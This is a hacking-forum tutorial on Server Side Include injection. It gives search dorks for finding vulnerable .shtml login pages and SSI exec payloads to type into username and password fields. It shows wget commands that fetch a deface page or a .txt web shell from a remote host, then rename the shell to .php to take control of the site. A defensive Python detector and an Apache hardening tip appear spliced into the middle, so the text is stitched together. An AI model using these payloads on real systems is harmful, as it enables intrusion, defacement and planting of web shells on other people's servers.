
SSI (Server Side Include) Injection, Shell and Deface Page uploading Tutorial
SSI (Server Side Include) injection is a web application exploit that lets you put your code remotely onto vulnerable websites.
Server Side Include injection allows you to upload files with multiple extensions, but a shell uploaded directly with a .php extension can't be executed, so you have to upload it as shell.txt and rename it to shell.php.
Let's begin ....

Dorks 

inurl:bin/Cklb/
inurl:login.shtml
inurl:login.shtm
inurl:login.stm
inurl:search.shtml
inurl:search.shtm
inurl:search.stm
inurl:forgot.shtml
inurl:forgot.shtm
inurl:forgot.stm
inurl:register.shtml
inurl:register.shtm
inurl:register.stm
inurl:login.shtml?page=
Try any dork or find sites manually.
To check whether a website is vulnerable, enter these commands in the Username and Password fields:

<!--#echo var="DATE_LOCAL" -->
It will show the date.

<!--#exec cmd="whoami"-->
It will display which user the server is running as.

<pre><!--#exec cmd="ls -a" --></pre> (Linux)
It will show all files in the directory.

<!--#exec cmd="dir" --> (Windows)
It will display all files in the directory.

For example, enter
<pre><!--#exec cmd="ls -a" --></pre>
in Username and Password to view all files of the website.
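
Seen from the server side, each probe above is a form field carrying "<!--#" that ends up in a page the server parses for SSI. The sketch below is an added example, not code from the original article; the function names and sample form values are constructed for illustration. It flags SSI directives in submitted fields, including URL-encoded ones, and HTML-escapes a value so the SSI parser no longer sees a directive.

```python
import html
import re
from urllib.parse import unquote_plus

# An SSI directive starts with "<!--#name"; whitespace before "#" is tolerated
# here so malformed probes are flagged too.
SSI_DIRECTIVE = re.compile(r"<!--\s*#\s*([a-z]+)", re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """URL-decode repeatedly so %253C-style double encoding is unwrapped."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def find_ssi_directives(value):
    """Return the lower-cased directive names found in one submitted field."""
    return [name.lower() for name in SSI_DIRECTIVE.findall(decode_fully(value))]

def neutralize(value):
    """Escape markup so the value is inert when written into an .shtml page."""
    return html.escape(value, quote=True)

def audit_form(fields):
    """Map field name -> directive names, only for fields that carry any."""
    hits = {}
    for field, value in fields.items():
        names = find_ssi_directives(value)
        if names:
            hits[field] = names
    return hits

# Constructed sample submissions (not real traffic).
SAMPLES = [
    {"username": "alice", "password": "correct horse"},
    {"username": '<!--#echo var="DATE_LOCAL" -->', "password": "x"},
    {"username": "bob", "password": "%3C!--%23exec%20cmd%3D%22whoami%22--%3E"},
    {"username": "%253C!--%2523exec cmd=%22dir%22 --%253E", "password": "x"},
]

if __name__ == "__main__":
    for form in SAMPLES:
        print(audit_form(form) or "clean", {k: neutralize(v) for k, v in form.items()})
```

On Apache, setting Options IncludesNOEXEC instead of Includes keeps SSI available while disabling the #exec directive these probes rely on.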
 
Now we have to upload our deface page or shell.
To upload a deface page, host/upload your deface page anywhere
(you can use pastehtml.com for it),
then enter this command in Username and Password:
<!--#exec cmd="wget http://website.com/deface.html" -->
To view your deface page, go to site.com/deface.html

To upload a shell to the website, you have to host your shell anywhere in .txt format,
then enter this command in the login form:
<!--#exec cmd="wget http://website.com/abc.txt" -->
To check whether your txt file was uploaded, list all files using

<pre><!--#exec cmd="ls -a" --></pre>
Now you have to change the .txt extension to .php.
To rename your txt file to php, use this command:
<!--#exec cmd="mv abc.txt abc.php" -->
Now go to site.com/abc.php and access your shell :)
Live demo

(Please don't harm the site; upload your files for testing only! Thanks)
Category: SSI | Added by: max_hacker (12.07.09)
1 Pr0b0t   (12.07.09 5:06 PM) [Entry]
really nice

WWW.GeniusHackers.NET © 2024